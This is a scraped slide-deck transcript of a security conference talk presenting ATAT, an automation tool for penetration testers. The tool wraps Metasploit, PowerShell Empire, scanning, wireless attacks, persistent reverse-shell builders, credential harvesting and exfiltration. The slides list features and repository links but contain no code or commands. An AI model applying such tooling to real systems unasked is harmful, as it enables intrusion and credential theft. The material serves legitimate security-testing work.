1 / 28

Attack Team Automation Tool

Attack Team Automation Tool. Taking on the entire rebellion with 2-3 Stormtroopers. *with Empire approved images & content. About – ll3N1GmAll A th , Sec-, C+, D12. Sith Hacker Lock pick village guy BSidesSTL co-founder Physical security course instructor

catherinec
Télécharger la présentation

Attack Team Automation Tool

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Attack Team Automation Tool Taking on the entire rebellion with 2-3 Stormtroopers *with Empire approved images & content

  2. About – ll3N1GmAll Ath, Sec-, C+, D12 • Sith • Hacker • Lock pick village guy • BSidesSTL co-founder • Physical security course instructor • Infosec dentist (see Jayson Street’s talk on failure) • Certified cert haver (with 12 essential certifications & minerals!) • Daniel 11:32b (KJV)

  3. Impetus –(╯°□°)╯︵ ┻━┻ • Vulnerability reports missing items like…ports… • Yeah, apparently that’s a thing • Large scopes, small squads, & tight deadlines • The need to use “Empire approved” existing tools • Features I wish existed; but that didn’t • Efficiency • Repeatability • Automation • Starts services, automates repetitive actions, etc • Noobs

  4. Substance • Simplicity is the best design choice • Well known industry standard Empire approved tools given ergonomic handles and “auto-pilot” functions • Poweshell Empire • Metasploit • Msfvenom • LBD • SSLScan • masscan • MPC • DBD • Still under active development • Fully Automated Windows, OSX, & Linux Privilege Escalation With Powershell Empire • POC attacks

  5. Origin • Metasploit automation script called “ezsploit” by rand0m1ze on github • ATAT is to ezsploit what SET is to BBQSQL • Nearly identical menu structure and layout • Every existing option has been completely rewritten and/or enhanced significantly • Except for 2; more on those later • Many new options that did not exist in the original script • ATAT has over 500% more Rebel smashing goodness than its predecessor!

  6. Features – Payloads • Create every conceivable Metasploit payload via MPC with ATAT’s built in payload creation “wizard”…I hate that term… • No AV gigs • All OSes • AV WIP

  7. Features – Multi-Target Exploitation • Basically RHOSTS for exploit modules with common options • This feature works with modules that only require: LHOST, LPORT, RHOST, RPORT, & PAYLOAD or less • This limitation is overcome by creating separate menu options for unique exploit types as you will see

  8. Features – Multi-Target Struts/Tomcat • RHOSTS feature for Apache Struts & Tomcat exploit modules • Adds: • SRVPORT • TARGETURI • HttpUsername • HttpPassword

  9. Features – Multi-Target Java JMX • RHOSTS feature for the Java JMX exploit module • Adds: • SRVPORT • JMXRMI

  10. Features – Multi-Target Java RMI • RHOSTS feature for the Java RMI exploit module • Adds: • SRVPORT • HTTPDELAY

  11. Features – Multi-Target SNMP Enum • Support for SNMP enumeration AUX module • Integrated for simplicity; not necessity

  12. Features – Multi-Target LBD • Multi-target load balancer detection • All results echo to screen along with being captured in a log within the ATAT directory

  13. Features – Multi-Target Masscan all TCP • Masscan all TCP ports(0-65535) against multiple targets • Rate limited sufficiently to prevent network meltdown; while still scanning very fast • All results echo to screen along with being captured in a log within the ATAT directory • Pause/Resume supported • Automatically feeds SSLScan

  14. Features – Multi-Target SSLScan • Multi-target SSLScan script (auto-fed by masscan/nmap) • All results echo to screen along with being captured in a log within the ATAT directory • Results further sorted into these groups: • RC4, SSLv2, heartbleed, freak, weak ciphers, expired certs, SSL certs found

  15. Features – Bloodhound • Installs Bloodhound and dependencies • Provides instructions for simple 1st time setup • Launches Neo4j console and Bloodhound interface automatically

  16. Features – Multi-Port Exploit • Launch 1 exploit at 1 target on multiple ports • Why? • Remember my earlier mention of vulnerability scan reports with port information missing? • When service identification isn’t providing clear information…_______ all the _______!!! • Non-standard • Banner/ID Fails • RPORTS

  17. Features – Multi-Port Auxiliary • Launch 1 auxiliary module against many hosts (where RHOSTS is supported) & against as many ports on each host as you wish • Basically RPORTS functionality for AUX modules • Again, for checking targets with reports of a vulnerability without complete information about where the service is running • And where the service may not be running on a standard port • Hopefully none of you find yourself in need of these multi-port features; but if you do…nothing else will do… • Searching for things on random ports

  18. Features – Listeners & PostEx • Create any type of listener Metasploit has to offer with built in intelligent automated post exploitation features • Identifies the target’s platform • Runs a wide array of applicable post exploitation modules using MSF’s own relied upon logic; but with a larger than normal set of post exploitation modules than MSF’s default

  19. Features – Persistence • Durandal backdoor builder by Skysploit (Travis Weathers) • Updated to work with newer gcc-mingw-w64-i686 compiler • Persistent encrypted daemonized reverse shells for: • Windows • Linux/NetBSD/FreeBSD/OpenBSD • Required significant fixes to function • Persistent encrypted daemonized bind shells for: • Windows • Work in progress • Linux/NetBSD/FreeBSD/OpenBSD • Work in progress • Android Meterpreter APK builder • Encrypted (HTTPS protocol) • Persistent • Stable

  20. Features – Empire & DeathStar • Launches Powershell Empire Console & RESTful API • Launches DeathStar Domain Admin Automation Tool • Admin PSE REST API • Create/Kill/Use • Listeners • Stagers – WIP 21/31 • Agents • Fully Automated Post Ex • Windows – WIP • Linux – WIP • OSX – WIP

  21. Features – Wireless Attacks • HostAPD-WPE • Enterprise WPA Fake RADIUS Attacks • Enterprise WPA Challenge / Response Pair Cracking • Asleap • John The Ripper • Airgeddon • DoS • WPA/WPA2 Online & Offline Attacks • Aircrack • Hashcat • Handshake tools (capturing & cleaning) • Evil Twin / Rogue AP Attacks • WPS Attacks • Reaver • Bully • WEP Attacks • Why not right? • WiFi Jammer

  22. Features – Data Exfiltration • Push Files via SCP • Creds required • Generates SCP command syntax for uploading to target • Push Files with Powershell & Meterpreter • Starts Apache • Generates MSF command for uploading a files to target • Generates PSH command for pulling files from attacker machine to target • Pull Files with Meterpreter • Generates MSF command to download files from target via Meterpreter • Wireless Password Stealer (plaintext) • Windows 32 & 64 bit Credential Harvester • Grabs nearly every imaginable password and private key type

  23. Features – Dependency Checker Prepare, charge, & make ready the laser cannons Installs and/or configures: • PowerShell Empire • DeathStar • pip install various python dependencies • gcc • gcc-mingw-w64-i686 • DBD • Curl • Jq • Bettercap • HostAPD-WPE • Airgeddon • Bloodhound • Etc., Etc., Etc….

  24. Remaining Items –¯\_(ツ)_/¯ • Option 3 – Msfconsole • Shortcut to launch msfconsole; very minor fixes to make this work • Otherwise, no reason to alter this • Option 5 – Armitage • Shortcut to launch Armitage GUI; very minor fixes to make this work • Otherwise, no reason to alter this *this slide not approved by the Galactic Empire

  25. Platforms • Tested on: • Kali • Parrot OS • Kali chroot environment on Android • Use ATAT-chrootGithub repo ATAT-chroot has been customized for use in a Kali chroot environment.

  26. Demo Time • Exploit with automated post exploitation

  27. Source • https://github.com/ll3N1GmAll/ATAT • Compatible with the current gcc-MingW-W64 compiler package that is available on newer systems (32 & 64 bit) • https://github.com/ll3N1GmAll/ATAT-chroot • Ported to chroot environment for Android mobile usage • https://github.com/ll3N1GmAll/ATAT_deprecated • Compatible with the older MingW32 compiler package on older systems (32 & 64 bit) • No longer maintained

  28. Contacts (twits & IRC) • @ll3NiGmAll • Not very active on the twits • ll3N1GmAll • Much more active on IRC • lll3N1GmAlll • Alternate nick • Email/Etc. • Come talk to me

More Related